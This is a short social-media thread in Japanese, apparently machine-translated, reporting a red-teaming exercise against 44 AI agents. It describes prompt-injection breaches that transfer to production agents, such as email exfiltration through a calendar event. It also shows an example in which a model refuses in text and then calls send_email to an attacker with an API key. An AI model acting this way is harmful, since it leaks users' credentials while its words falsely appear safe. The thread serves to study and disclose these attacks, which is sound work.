私たちは44のAIエージェントを展開し、彼らを攻撃するためにインターネットに170ドルを提供しました。 1.8M の試行、62K の侵害 (データ漏洩や経済的損失を含む)。 🚨 懸念されることに、同じエクスプロイトがライブプロダクションエージェントに転送されます...(例:カレンダーイベントによるメールの流出) 🧵
多くの休憩は普遍的で譲渡可能です。 コピー&ペーストパターンは、タスク、モデル、ガードレール全体で機能しました。今日、それが 1 人のエージェントを壊した場合、それはおそらくあなたのエージェントを壊すでしょう。
お気に入りの失敗:「テキストで拒否し、ツールで行動する」。 😈 モデル: 「資格情報を共有できません。」 次に: send_email(to=attacker, body="API_KEY=****") UI は安全に見えます。ツール層がダメージを与えます。
489.94K